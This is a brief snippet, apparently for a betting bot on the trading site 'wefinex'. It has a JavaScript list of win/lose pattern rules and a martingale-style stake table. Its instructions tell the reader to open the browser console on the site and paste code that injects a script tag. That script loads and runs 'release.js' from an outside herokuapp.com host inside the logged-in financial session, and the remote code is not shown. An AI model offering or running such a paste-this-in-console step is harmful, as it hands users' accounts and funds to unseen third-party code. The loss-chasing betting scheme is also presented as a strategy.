
FLow rule

var listRule = [
    "xxx->x",
    "xxxdx->x",
    "xxxdd->x",
    "xxxdxdx->x",
    "xxxdxdd->x",
    "xxxdddx->x",
    "xxxdddd->x",
    "xxxdxdxdx->x",
    "xxxdxdxdd->x",
    "xxxdxdddd->x",
    "xxxdxdddx->x",
    "xxxdddxdx->x",
    "xxxdddxdd->x",
    "xxxdddddx->x",
    "xxxdddddd->x",
	"ddd->d",
	"dddxd->d",
	"dddxx->d",
	"dddxdxd->d",
	"dddxdxx->d",
	"dddxxxd->d",
	"dddxxxx->d",
	"dddxdxdxd->d",
	"dddxdxdxx->d",
	"dddxdxxxx->d",
	"dddxdxxxd->d",
	"dddxxxdxd->d",
	"dddxxxdxx->d",
	"dddxxxxxd->d",
	"dddxxxxxx->d",
];

var lostValueSet = {
  	0: 1,
    1: 2,
    2: 4,
    3: 6
};


Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console

3s cuoi danh
//check lost more > 3

var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
